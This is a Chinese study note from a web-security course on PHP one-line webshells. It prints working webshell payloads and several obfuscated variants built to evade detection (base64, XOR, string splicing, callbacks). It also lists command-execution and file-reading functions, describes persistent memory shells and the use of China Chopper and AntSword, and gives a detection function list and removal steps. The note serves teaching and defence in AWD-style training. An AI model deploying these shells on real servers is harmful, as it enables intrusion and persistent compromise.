web安全基础--一句话木马笔记

课程：https://www.bilibili.com/video/BV1VA411u7Tg?p=7

一句话木马

可执行脚本文件

可以是很多种语言php、jsp等等

需要满足三个条件：木马能成功上传到服务器、我们知道木马上传到服务器的路径、上传的木马能被解析执行。

例如

<?php @eval($_POST['cmd']);?>

@是不报错的意思

以post方法获取cmd变量

eval()将括号里的按php代码执行

例如，传入cmd=phpinfo();，那么最后执行的就是<?php @eval("phpinfo();");?>

phpinfo()会得到当前php的大量信息，包括环境变量、服务器信息、php版本等

浏览器可以使用hackbar插件用来提交数据，先把url加载出来，点击post data，将要传入的cmd=phpinfo();写入，点击Execute执行

想执行命令的话，用PHP的命令执行函数例如，输入cmd=system(whoami);

eval()函数有时候可以被assert代替，因为eval函数不支持动态调用

动态调用例子：<?php @a="phpinfo";@a(); ?>

注：php7.1将assert废弃了

木马的变形

传统防护检测的免杀方法

隐藏关键字

例如，绕过<?的限制<script language="php">@eval($_POST['x'])</script>

差分拼接

<?php
$arr=explode(",","a,s,d,f,s,d,e,k,r,t");//把字符串打散为数组
$payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert
//php版本要求:<=7.0
@$payload(@$_GET['x']);
?>

编码的方式

<?php
$a=base64_decode("YXNzZXJ0");
$@a($_POST('cmd'));
?>

随机异或，用异或运算来组成字符

<?php
//也可以用十六进制进行进一步加密，例如
//$r="x4d"^"x3f"
$a="Y"^"8";//a
$b="T"^"";//s
$c="*"^"O";//e
$d="M"^"?";//r
$e="-"^"Y";//t
$payload(@$_POST['x']);
?>

可变函数

<?php
@$_REQUEST['e'](@$_REQUEST['x']);
//传入e=assert&x=command命令
?>

与POST、GET不同的REQUEST()：通过post和get传递的参数通过request都能获取到

可变变量

<?php
$a='assert';
$b='a';
//$$b=$a='assert'
$$b($_POST['x']);
//assert($_POST['x'])
?>

使用回调函数

例如call_user_func($callback,$parameter)其中参数$callback指被调用的回调函数，$parameter表示0个或以上的参数，被传入回调函数。

例

<?php
@call_user_func($_GET['id'],$_POST['a']);
//传入id=eval&a=command
?>

还有好多其他的回调函数

php手册中可以搜索called等关键字查询

木马的使用

执行系统的命令

system()执行外部程序，并显示输出

passthru()执行外部程序并且显示原始输出

exec()执行一个外部程序，不输出结果，echo也只返回结果最后一行

shell_exec()或者’ ’ 通过shell环境执行命令，需要echo返回打印（全部结果）

读文件

file_get_contents 将整个文件读入为一个字符串，用echo打印

file()把整个文件读入一个数组中，数组应var_dump函数输出

readfile读取一个文件，并写入输出缓冲，不需要echo就可以输出

遍历目录

scandir()函数返回一个制定目录中的文件和目录的数组

木马特种与查杀（AWD）

特征检测，检测敏感关键字，如：危险函数、特殊函数

工具：D盾

一些会被认为是木马的特征函数:

代码执行函数：eval、assert、per_replace(正则替换的函数)、create_function(创造匿名函数)、回调函数（call_user_func、call_user_func_array、等）

命令执行函数：shell_exec()、proc_open()执行一个命令并打开用来输入输出的文件指针、popen()通过参数传递一条命令并对popen打开的文件执行、等

文件操作函数：file_get_countents将整个文件读入为一个字符串、file_put_contents将一个字符串写入文件、file()把整个文件读入一个数组中、fopen打开文件或者URL、rename重命名一个文件或目录、等

包含函数：require、require_once、include、include_once

特殊函数：phpinfo、变量覆盖（parse_str、extract）、等

D盾查杀

可以扫描到一些可疑函数，但并不能确定

不死马

是内存马，它无文件，但程序会永久的与运行在PHP进程中，无限执行，很隐藏不易被发现，也不容易被删除

例如

ignore_user_abort(true)：此函数用来设置客户机断开后是否会终止脚本的执行，设置成true，客户机断开后脚本仍然会执行。

set_time_limit(0)：设置脚本最大执行时间，设为0表示没有限制。

unlink(_FILE _)：删除文件本身，起到隐藏自身的作用。

usleep()：延迟执行当前脚本若干微妙。

注意，pass参数使用了MD5加密，防止木马被他人利用。

不死马的查杀

1.重启服务，比如php等web服务。

2.创建一个和不死马同名的文件夹。

3.删除相应进程。查出不死马进程PID后，用命令kill-9 PID杀掉进程。

4.竞争写入删除不死马的文件，usleep的事件必须要小于不死马的延迟时间才会有效。

菜刀蚁剑使用介绍

小马：短小精悍，比如一句话木马，但实现的功能少；

大马：脚本大小会比较庞大，但它能实现更复杂的功能；

可以先传小马，在利用小马执行大马

利用菜刀、蚁剑等工具可以一键实现

用蚁剑抓包，其中cmd连接密码，随即参数传递真实命令

不一定要使用base64编码，可以是其他编码